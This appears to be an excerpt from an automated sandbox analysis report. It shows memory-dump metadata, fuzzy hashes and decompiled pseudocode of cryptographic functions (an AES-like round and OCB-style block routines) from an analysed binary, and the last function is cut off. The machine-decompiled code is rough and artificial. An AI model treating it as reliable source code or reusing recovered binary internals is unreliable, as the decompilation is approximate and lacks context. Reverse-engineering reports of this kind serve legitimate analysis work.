                                                              0x00ba3f1c
                                                              0x00ba3f21
                                                              0x00ba3f25
                                                              0x00ba3f28
                                                              0x00ba3f2b
                                                              0x00ba3f2c
                                                              0x00ba3f2f
                                                              0x00ba3f3e
                                                              0x00ba3f3e
                                                              0x00ba3d76
                                                              0x00ba3d76
                                                              0x00ba3d89
                                                              0x00ba3d8d
                                                              0x00ba3d91
                                                              0x00ba3d98
                                                              0x00ba3da3
                                                              0x00ba3da7
                                                              0x00ba3dab
                                                              0x00ba3db5
                                                              0x00ba3db9
                                                              0x00ba3dbd
                                                              0x00ba3dbf
                                                              0x00ba3dc1
                                                              0x00ba3dc4
                                                              0x00ba3dcc
                                                              0x00ba3dd0
                                                              0x00ba3dd2
                                                              0x00ba3dd6
                                                              0x00ba3dda
                                                              0x00ba3de2
                                                              0x00ba3de5
                                                              0x00ba3de8
                                                              0x00ba3deb
                                                              0x00ba3dee
                                                              0x00ba3df1
                                                              0x00ba3df1
                                                              0x00ba3df6
                                                              0x00ba3dfa
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3e15
                                                              0x00ba3e1e
                                                              0x00ba3e22
                                                              0x00ba3e28
                                                              0x00ba3e2c
                                                              0x00ba3e32
                                                              0x00ba3e36
                                                              0x00ba3e3d
                                                              0x00ba3e41
                                                              0x00ba3e45
                                                              0x00ba3e49
                                                              0x00ba3e4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3e4d
                                                              0x00ba4064
                                                              0x00ba4069
                                                              0x00ba406a
                                                              0x00ba406b
                                                              0x00ba4078
                                                              0x00ba4078
                                                              0x00ba3d05
                                                              0x00ba3d05
                                                              0x00ba3d06
                                                              0x00ba3d0a
                                                              0x00ba3d19
                                                              0x00ba3d19
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c77b92829dc116b239ef73597368f4f248db79573dd40e73930760c2fb966c0
                                                              • Instruction ID: 7485084bf8dee139c0055ae3a2d8b1ff430259722f89a104f68d2e41369e1d97
                                                              • Opcode Fuzzy Hash: 7c77b92829dc116b239ef73597368f4f248db79573dd40e73930760c2fb966c0
                                                              • Instruction Fuzzy Hash: 6BD1DE71A087409FC358CF29C48091BFBE1BFC9710F95892EF59A87361E671E945CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9E380, Relevance: .3, Instructions: 261COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 57%
                                                              			E00B9E380(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi) {
				unsigned int _t107;
				signed int _t120;
				signed char _t121;
				signed char _t135;
				signed int _t139;
				unsigned int _t148;
				signed int _t154;
				signed int* _t217;
				intOrPtr _t321;
				void* _t338;

				 *(_t338 + 0x14) = __edi;
				_t107 = __eax ^  *__edi;
				_t120 = __ebx ^ __edi[1];
				_t135 = __ecx ^ __edi[2];
				_t148 = __edx ^ __edi[3];
				 *((intOrPtr*)(_t338 + 0x18)) = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
				0;
				do {
					 *(_t338 + 4) =  *(_t321 + (_t107 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t135 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t148 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					_t121 = _t120 >> 0x10;
					 *(_t338 + 8) =  *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t135 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t148 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t107 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					_t154 =  *(_t321 + (_t148 & 0xff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t107 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t121 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t135 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					_t139 =  *(_t321 + (_t135 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t148 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t107 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t121 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018;
					asm("ror ebp, 0x10");
					asm("ror edi, 0x18");
					asm("rol ecx, 0x18");
					asm("ror ebp, 0x10");
					asm("ror edi, 0x18");
					asm("rol edx, 0x18");
					asm("ror ebp, 0x10");
					asm("ror edi, 0x18");
					asm("rol eax, 0x18");
					asm("ror ebp, 0x10");
					asm("ror edi, 0x18");
					asm("rol ebx, 0x18");
					_t321 =  *((intOrPtr*)(_t338 + 0x1c));
					_t217 =  &(( *(_t338 + 0x14))[4]);
					_t107 =  *(_t338 + 4) ^ 0x80808080 ^ 0x80808080 - ((0x80808080 &  *(_t338 + 4)) >> 0x00000007) & 0x1b1b1b1b ^  *(_t338 + 4) +  *(_t338 + 4) & 0xfefefefe ^  *(_t338 + 4) ^  *(_t338 + 4) ^  *_t217;
					_t120 =  *(_t338 + 8) ^ 0x80808080 ^ 0x80808080 - ((0x80808080 &  *(_t338 + 8)) >> 0x00000007) & 0x1b1b1b1b ^  *(_t338 + 8) +  *(_t338 + 8) & 0xfefefefe ^  *(_t338 + 8) ^  *(_t338 + 8) ^ _t217[1];
					_t135 = _t139 ^ 0x80808080 ^ 0x80808080 - ((0x80808080 & _t139) >> 0x00000007) & 0x1b1b1b1b ^ _t139 + _t139 & 0xfefefefe ^ _t139 ^ _t139 ^ _t217[2];
					_t148 = _t154 ^ 0x80808080 ^ 0x80808080 - ((0x80808080 & _t154) >> 0x00000007) & 0x1b1b1b1b ^ _t154 + _t154 & 0xfefefefe ^ _t154 ^ _t154 ^ _t217[3];
					 *(_t338 + 0x14) = _t217;
				} while (_t217 <  *((intOrPtr*)(_t338 + 0x18)));
				 *(_t338 + 4) =  *(_t321 + (_t107 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t135 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t148 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
				 *(_t338 + 8) =  *(_t321 + (_t120 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t321 + (_t135 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t321 + (_t148 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t321 + (_t107 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
				return  *(_t338 + 4) ^ ( *(_t338 + 0x14))[4];
			}













                                                              0x00b9e380
                                                              0x00b9e384
                                                              0x00b9e386
                                                              0x00b9e389
                                                              0x00b9e38c
                                                              0x00b9e39c
                                                              0x00b9e3be
                                                              0x00b9e3c0
                                                              0x00b9e3fe
                                                              0x00b9e40a
                                                              0x00b9e443
                                                              0x00b9e4c4
                                                              0x00b9e4c6
                                                              0x00b9e4e7
                                                              0x00b9e4f0
                                                              0x00b9e4f5
                                                              0x00b9e51b
                                                              0x00b9e524
                                                              0x00b9e529
                                                              0x00b9e54f
                                                              0x00b9e558
                                                              0x00b9e55d
                                                              0x00b9e583
                                                              0x00b9e58c
                                                              0x00b9e591
                                                              0x00b9e59c
                                                              0x00b9e5a0
                                                              0x00b9e5a3
                                                              0x00b9e5a5
                                                              0x00b9e5a8
                                                              0x00b9e5ab
                                                              0x00b9e5b2
                                                              0x00b9e5b2
                                                              0x00b9e5fa
                                                              0x00b9e63f
                                                              0x00b9e6d4

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b32b9f09d68a8ba3adc6463fbd9cf88116f9db414d22f8215cfaa78ec6d93ad
                                                              • Instruction ID: 2e44cd805bab52df98ba5988aa0316d476129c974bd8044687bc0cf43692a2f4
                                                              • Opcode Fuzzy Hash: 0b32b9f09d68a8ba3adc6463fbd9cf88116f9db414d22f8215cfaa78ec6d93ad
                                                              • Instruction Fuzzy Hash: 5191D473918BBE06D7605EAF88041B9F6E3AFC8210F9B0776DD9463642C970AE4696D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9DBA0, Relevance: .3, Instructions: 251COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00B9DBA0(void* __ebp, unsigned int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, char _a56, signed int _a72, intOrPtr* _a80, intOrPtr _a84, intOrPtr _a88, signed int _a92) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t139;
				unsigned int _t143;
				void* _t149;
				signed int _t157;
				signed int* _t165;
				signed int* _t173;
				unsigned int _t177;
				void* _t178;
				signed int _t184;
				signed int _t187;
				signed int _t188;
				signed int _t200;
				signed int _t201;
				void* _t217;
				signed char _t229;
				unsigned int _t230;
				signed int _t248;
				signed int _t249;
				intOrPtr* _t250;
				unsigned int _t252;
				void* _t253;
				signed int _t254;
				void* _t256;
				signed int _t257;

				E00C6BB10(0x4c);
				_t139 =  *0xcc5970; // 0x851ab4dd
				_a72 = _t139 ^ _t254;
				_a16 = _a88;
				_t187 = _a92;
				_t250 = _a80;
				_t252 =  *(_t250 + 0x54);
				_t184 = _t187 >> 4;
				_v0 = _a84;
				_t248 =  *(_t250 + 0x50);
				_t143 = _t184 + _t248;
				asm("adc edx, ebp");
				_a20 = _t184;
				_a4 = _t143;
				_a8 = 0;
				if(_t184 == 0) {
					L10:
					_t248 = _t248 + 1;
					asm("adc ebp, 0x0");
					__eflags = _t252 - _a8;
					if(__eflags > 0) {
						goto L22;
					} else {
						if(__eflags < 0) {
							L13:
							_t184 = 0;
							__eflags = _t248 & 0x00000001;
							_t201 = _t248;
							_t230 = _t252;
							_a12 = 0;
							if((_t248 & 0x00000001) == 0) {
								do {
									_a12 = _a12 + 1;
									_t201 = (_t230 << 0x00000020 | _t201) >> 1;
									_t184 = 0;
									_t230 = _t230 >> 1;
									__eflags = _t201 & 0x00000001;
								} while ((_t201 & 0x00000001) == 0);
							}
							_push(_a12);
							_push(_t250);
							_t157 = E00B9D530();
							_t257 = _t254 + 8;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L8;
							} else {
								goto L17;
							}
						} else {
							__eflags = _t248 - _t143;
							if(_t248 > _t143) {
								goto L22;
							} else {
								goto L13;
								do {
									do {
										goto L13;
										L17:
										 *(_t250 + 0x88) =  *(_t250 + 0x88) ^  *_t157;
										 *(_t250 + 0x8c) =  *(_t250 + 0x8c) ^  *(_t157 + 4);
										 *(_t250 + 0x90) =  *(_t250 + 0x90) ^  *(_t157 + 8);
										 *(_t250 + 0x94) =  *(_t250 + 0x94) ^  *(_t157 + 0xc);
										_t165 = (_t248 -  *(_t250 + 0x50) - 1 << 4) + _v0;
										_a24 =  *(_t250 + 0x88) ^  *_t165;
										_a28 =  *(_t250 + 0x8c) ^ _t165[1];
										_a32 =  *(_t250 + 0x90) ^ _t165[2];
										_a36 =  *(_t250 + 0x94) ^ _t165[3];
										 *(_t250 + 0x98) =  *(_t250 + 0x98) ^  *_t165;
										 *(_t250 + 0x9c) =  *(_t250 + 0x9c) ^ _t165[1];
										 *(_t250 + 0xa0) =  *(_t250 + 0xa0) ^ _t165[2];
										 *(_t250 + 0xa4) =  *(_t250 + 0xa4) ^ _t165[3];
										 *((intOrPtr*)( *_t250))( &_a24,  &_a40,  *((intOrPtr*)(_t250 + 8)));
										_t254 = _t257 + 0xc;
										_t173 = (_t248 -  *(_t250 + 0x50) - 1 << 4) + _a16;
										 *_t173 =  *(_t250 + 0x88) ^ _a40;
										_t173[1] =  *(_t250 + 0x8c) ^ _a44;
										_t248 = _t248 + 1;
										asm("adc ebp, 0x0");
										_t173[2] =  *(_t250 + 0x90) ^ _a48;
										_t173[3] =  *(_t250 + 0x94) ^ _a52;
										__eflags = _t252 - _a8;
									} while (__eflags < 0);
									if(__eflags > 0) {
										break;
									} else {
										goto L19;
									}
									goto L28;
									L19:
									__eflags = _t248 - _a4;
								} while (_t248 <= _a4);
								_t184 = _a20;
								goto L21;
							}
						}
					}
				} else {
					_t230 = 0;
					if(_t143 != _t143 || _a8 != 0 ||  *((intOrPtr*)(_t250 + 0x10)) == 0) {
						goto L10;
					} else {
						_t217 = 0;
						_t177 = _t143 >> 1;
						while(_t177 != 0) {
							_t217 = _t217 + 1;
							_t177 = _t177 >> 1;
						}
						_push(_t217);
						_push(_t250);
						_t178 = E00B9D530();
						_t257 = _t254 + 8;
						if(_t178 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x10))))(_v0, _a16, _t184,  *((intOrPtr*)(_t250 + 8)),  *(_t250 + 0x50) + 1, _t250 + 0x88,  *((intOrPtr*)(_t250 + 0x40)), _t250 + 0x98);
							_t254 = _t257 + 0x20;
							L21:
							_t187 = _a92;
							_t143 = _a4;
							L22:
							_t188 = _t187 & 0x0000000f;
							__eflags = _t188;
							_t249 = _t188;
							if(_t188 > 0) {
								 *(_t250 + 0x88) =  *(_t250 + 0x88) ^  *(_t250 + 0x20);
								 *(_t250 + 0x8c) =  *(_t250 + 0x8c) ^  *(_t250 + 0x24);
								 *(_t250 + 0x90) =  *(_t250 + 0x90) ^  *(_t250 + 0x28);
								 *(_t250 + 0x94) =  *(_t250 + 0x94) ^  *(_t250 + 0x2c);
								 *((intOrPtr*)( *_t250))(_t250 + 0x88,  &_a56,  *((intOrPtr*)(_t250 + 8)));
								_t256 = _t254 + 0xc;
								_t149 = 0;
								__eflags = _t249;
								if(_t249 > 0) {
									_t253 = (_t184 << 4) + _v0;
									_t200 = (_t184 << 4) + _a16;
									__eflags = _t200;
									do {
										_t229 =  *(_t149 + _t253) ^  *(_t256 + _t149 + 0x48);
										_t149 = _t149 + 1;
										 *(_t200 + _t149 - 1) = _t229;
										__eflags = _t149 - _t249;
									} while (_t149 < _t249);
								}
								_t184 = (_t184 << 4) + _v0;
								_a24 = 0;
								_a28 = 0;
								_a32 = 0;
								_a36 = 0;
								E00C6B7A0(_t184, _t249, _t250,  &_a24, _t184, _t249);
								 *((char*)(_t256 + _t249 + 0x34)) = 0x80;
								 *(_t250 + 0x98) =  *(_t250 + 0x98) ^ _a24;
								 *(_t250 + 0xa0) =  *(_t250 + 0xa0) ^ _a32;
								 *(_t250 + 0x9c) =  *(_t250 + 0x9c) ^ _a28;
								_t143 = _a4;
								_t254 = _t256 + 0xc;
								_t131 = _t250 + 0xa4;
								 *_t131 =  *(_t250 + 0xa4) ^ _a36;
								__eflags =  *_t131;
							}
							 *(_t250 + 0x50) = _t143;
							 *(_t250 + 0x54) = _a8;
							__eflags = _a72 ^ _t254;
							return E00C69C26(1, _t184, _a72 ^ _t254, _a8, _t249, _t250);
						} else {
							L8:
							return E00C69C26(0, _t184, _a72 ^ _t257, _t230, _t248, _t250);
						}
					}
				}
				L28:
			}































                                                              0x00b9dba5
                                                              0x00b9dbaa
                                                              0x00b9dbb1
                                                              0x00b9dbbf
                                                              0x00b9dbc3
                                                              0x00b9dbc8
                                                              0x00b9dbcc
                                                              0x00b9dbd1
                                                              0x00b9dbd4
                                                              0x00b9dbd9
                                                              0x00b9dbe0
                                                              0x00b9dbe2
                                                              0x00b9dbe4
                                                              0x00b9dbe8
                                                              0x00b9dbec
                                                              0x00b9dbf2
                                                              0x00b9dc6b
                                                              0x00b9dc6b
                                                              0x00b9dc6e
                                                              0x00b9dc71
                                                              0x00b9dc75
                                                              0x00000000
                                                              0x00b9dc7b
                                                              0x00b9dc7b
                                                              0x00b9dc85
                                                              0x00b9dc8a
                                                              0x00b9dc8c
                                                              0x00b9dc8e
                                                              0x00b9dc90
                                                              0x00b9dc92
                                                              0x00b9dc9a
                                                              0x00b9dca0
                                                              0x00b9dca0
                                                              0x00b9dca4
                                                              0x00b9dcad
                                                              0x00b9dcaf
                                                              0x00b9dcb1
                                                              0x00b9dcb1
                                                              0x00b9dca0
                                                              0x00b9dcb9
                                                              0x00b9dcba
                                                              0x00b9dcbb
                                                              0x00b9dcc0
                                                              0x00b9dcc3
                                                              0x00b9dcc5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9dc7d
                                                              0x00b9dc7d
                                                              0x00b9dc7f
                                                              0x00000000
                                                              0x00b9dc85
                                                              0x00000000
                                                              0x00b9dc85
                                                              0x00b9dc85
                                                              0x00000000
                                                              0x00b9dccb
                                                              0x00b9dccd
                                                              0x00b9dcd6
                                                              0x00b9dcdf
                                                              0x00b9dce8
                                                              0x00b9dd03
                                                              0x00b9dd0c
                                                              0x00b9dd16
                                                              0x00b9dd26
                                                              0x00b9dd2a
                                                              0x00b9dd30
                                                              0x00b9dd39
                                                              0x00b9dd42
                                                              0x00b9dd4e
                                                              0x00b9dd61
                                                              0x00b9dd7c
                                                              0x00b9dd83
                                                              0x00b9dd87
                                                              0x00b9dd89
                                                              0x00b9dda0
                                                              0x00b9dda3
                                                              0x00b9dda6
                                                              0x00b9dda9
                                                              0x00b9ddac
                                                              0x00b9ddac
                                                              0x00b9ddb6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9ddb8
                                                              0x00b9ddb8
                                                              0x00b9ddb8
                                                              0x00b9ddc2
                                                              0x00000000
                                                              0x00b9ddc2
                                                              0x00b9dc7f
                                                              0x00b9dc7b
                                                              0x00b9dbf4
                                                              0x00b9dbf4
                                                              0x00b9dbf8
                                                              0x00000000
                                                              0x00b9dc05
                                                              0x00b9dc05
                                                              0x00b9dc07
                                                              0x00b9dc09
                                                              0x00b9dc10
                                                              0x00b9dc11
                                                              0x00b9dc11
                                                              0x00b9dc15
                                                              0x00b9dc16
                                                              0x00b9dc17
                                                              0x00b9dc1c
                                                              0x00b9dc21
                                                              0x00b9dc61
                                                              0x00b9dc63
                                                              0x00b9ddc6
                                                              0x00b9ddc6
                                                              0x00b9ddca
                                                              0x00b9ddce
                                                              0x00b9ddce
                                                              0x00b9ddce
                                                              0x00b9ddd1
                                                              0x00b9ddd3
                                                              0x00b9dddc
                                                              0x00b9dde5
                                                              0x00b9ddf1
                                                              0x00b9ddfa
                                                              0x00b9de0f
                                                              0x00b9de11
                                                              0x00b9de14
                                                              0x00b9de16
                                                              0x00b9de18
                                                              0x00b9de23
                                                              0x00b9de2f
                                                              0x00b9de2f
                                                              0x00b9de31
                                                              0x00b9de34
                                                              0x00b9de38
                                                              0x00b9de39
                                                              0x00b9de3d
                                                              0x00b9de3d
                                                              0x00b9de31
                                                              0x00b9de46
                                                              0x00b9de4b
                                                              0x00b9de4f
                                                              0x00b9de53
                                                              0x00b9de57
                                                              0x00b9de61
                                                              0x00b9de66
                                                              0x00b9de6f
                                                              0x00b9de7d
                                                              0x00b9de87
                                                              0x00b9de8d
                                                              0x00b9de91
                                                              0x00b9de94
                                                              0x00b9de94
                                                              0x00b9de94
                                                              0x00b9de94
                                                              0x00b9dea3
                                                              0x00b9dea6
                                                              0x00b9deac
                                                              0x00b9debb
                                                              0x00b9dc26
                                                              0x00b9dc26
                                                              0x00b9dc37
                                                              0x00b9dc37
                                                              0x00b9dc21
                                                              0x00b9dbf8
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4fba50c2795947481df4c6b988e62e7d3fe7bb3862334d1ef97043b04d5ccd
                                                              • Instruction ID: 3a4a263534f940a5f162bae33eea8bf6f21bc8db415d544526022651fccad647
                                                              • Opcode Fuzzy Hash: 0b4fba50c2795947481df4c6b988e62e7d3fe7bb3862334d1ef97043b04d5ccd
                                                              • Instruction Fuzzy Hash: 7BA10271608B019FD728CF29C881A6BF7F1FFC8304F45896DE59A87251DA70E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9DEC0, Relevance: .3, Instructions: 251COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 68%
                                                              			E00B9DEC0(void* __ebp, unsigned int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, char _a56, signed int _a72, intOrPtr* _a80, intOrPtr _a84, intOrPtr _a88, signed int _a92) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t140;
				unsigned int _t144;
				void* _t150;
				signed int _t158;
				signed int* _t166;
				signed int* _t174;
				unsigned int _t178;
				void* _t179;
				signed int _t185;
				signed int _t188;
				signed int _t189;
				signed int _t201;
				signed int _t202;
				void* _t218;
				signed char _t230;
				unsigned int _t231;
				signed int _t249;
				signed int _t250;
				intOrPtr* _t251;
				unsigned int _t253;
				void* _t254;
				signed int _t255;
				void* _t257;
				signed int _t258;

				E00C6BB10(0x4c);
				_t140 =  *0xcc5970; // 0x851ab4dd
				_a72 = _t140 ^ _t255;
				_v0 = _a88;
				_t188 = _a92;
				_t251 = _a80;
				_t253 =  *(_t251 + 0x54);
				_t185 = _t188 >> 4;
				_a16 = _a84;
				_t249 =  *(_t251 + 0x50);
				_t144 = _t185 + _t249;
				asm("adc edx, ebp");
				_a20 = _t185;
				_a4 = _t144;
				_a8 = 0;
				if(_t185 == 0) {
					L10:
					_t249 = _t249 + 1;
					asm("adc ebp, 0x0");
					__eflags = _t253 - _a8;
					if(__eflags > 0) {
						goto L22;
					} else {
						if(__eflags < 0) {
							L13:
							_t185 = 0;
							__eflags = _t249 & 0x00000001;
							_t202 = _t249;
							_t231 = _t253;
							_a12 = 0;
							if((_t249 & 0x00000001) == 0) {
								do {
									_a12 = _a12 + 1;
									_t202 = (_t231 << 0x00000020 | _t202) >> 1;
									_t185 = 0;
									_t231 = _t231 >> 1;
									__eflags = _t202 & 0x00000001;
								} while ((_t202 & 0x00000001) == 0);
							}
							_push(_a12);
							_push(_t251);
							_t158 = E00B9D530();
							_t258 = _t255 + 8;
							__eflags = _t158;
							if(_t158 == 0) {
								goto L8;
							} else {
								goto L17;
							}
						} else {
							__eflags = _t249 - _t144;
							if(_t249 > _t144) {
								goto L22;
							} else {
								goto L13;
								do {
									do {
										goto L13;
										L17:
										 *(_t251 + 0x88) =  *(_t251 + 0x88) ^  *_t158;
										 *(_t251 + 0x8c) =  *(_t251 + 0x8c) ^  *(_t158 + 4);
										 *(_t251 + 0x90) =  *(_t251 + 0x90) ^  *(_t158 + 8);
										 *(_t251 + 0x94) =  *(_t251 + 0x94) ^  *(_t158 + 0xc);
										_t166 = (_t249 -  *(_t251 + 0x50) - 1 << 4) + _a16;
										_a24 =  *(_t251 + 0x88) ^  *_t166;
										_a28 =  *(_t251 + 0x8c) ^ _t166[1];
										_a32 = _t166[2] ^  *(_t251 + 0x90);
										_a36 = _t166[3] ^  *(_t251 + 0x94);
										 *((intOrPtr*)( *((intOrPtr*)(_t251 + 4))))( &_a24,  &_a40,  *((intOrPtr*)(_t251 + 0xc)));
										_t255 = _t258 + 0xc;
										_t174 = (_t249 -  *(_t251 + 0x50) - 1 << 4) + _v0;
										 *_t174 =  *(_t251 + 0x88) ^ _a40;
										_t174[1] =  *(_t251 + 0x8c) ^ _a44;
										_t174[2] =  *(_t251 + 0x90) ^ _a48;
										_t174[3] =  *(_t251 + 0x94) ^ _a52;
										 *(_t251 + 0x98) =  *(_t251 + 0x98) ^  *_t174;
										 *(_t251 + 0x9c) =  *(_t251 + 0x9c) ^ _t174[1];
										 *(_t251 + 0xa0) =  *(_t251 + 0xa0) ^ _t174[2];
										 *(_t251 + 0xa4) =  *(_t251 + 0xa4) ^ _t174[3];
										_t249 = _t249 + 1;
										asm("adc ebp, 0x0");
										__eflags = _t253 - _a8;
									} while (__eflags < 0);
									if(__eflags > 0) {
										break;
									} else {
										goto L19;
									}
									goto L28;
									L19:
									__eflags = _t249 - _a4;
								} while (_t249 <= _a4);
								_t185 = _a20;
								goto L21;
							}
						}
					}
				} else {
					_t231 = 0;
					if(_t144 != _t144 || _a8 != 0 ||  *((intOrPtr*)(_t251 + 0x10)) == 0) {
						goto L10;
					} else {
						_t218 = 0;
						_t178 = _t144 >> 1;
						while(_t178 != 0) {
							_t218 = _t218 + 1;
							_t178 = _t178 >> 1;
						}
						_push(_t218);
						_push(_t251);
						_t179 = E00B9D530();
						_t258 = _t255 + 8;
						if(_t179 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x10))))(_a16, _v0, _t185,  *((intOrPtr*)(_t251 + 0xc)),  *(_t251 + 0x50) + 1, _t251 + 0x88,  *((intOrPtr*)(_t251 + 0x40)), _t251 + 0x98);
							_t255 = _t258 + 0x20;
							L21:
							_t188 = _a92;
							_t144 = _a4;
							L22:
							_t189 = _t188 & 0x0000000f;
							__eflags = _t189;
							_t250 = _t189;
							if(_t189 > 0) {
								 *(_t251 + 0x88) =  *(_t251 + 0x88) ^  *(_t251 + 0x20);
								 *(_t251 + 0x8c) =  *(_t251 + 0x8c) ^  *(_t251 + 0x24);
								 *(_t251 + 0x90) =  *(_t251 + 0x90) ^  *(_t251 + 0x28);
								 *(_t251 + 0x94) =  *(_t251 + 0x94) ^  *(_t251 + 0x2c);
								 *((intOrPtr*)( *_t251))(_t251 + 0x88,  &_a56,  *((intOrPtr*)(_t251 + 8)));
								_t257 = _t255 + 0xc;
								_t150 = 0;
								__eflags = _t250;
								if(_t250 > 0) {
									_t254 = (_t185 << 4) + _a16;
									_t201 = (_t185 << 4) + _v0;
									__eflags = _t201;
									do {
										_t230 =  *(_t150 + _t254) ^  *(_t257 + _t150 + 0x48);
										_t150 = _t150 + 1;
										 *(_t201 + _t150 - 1) = _t230;
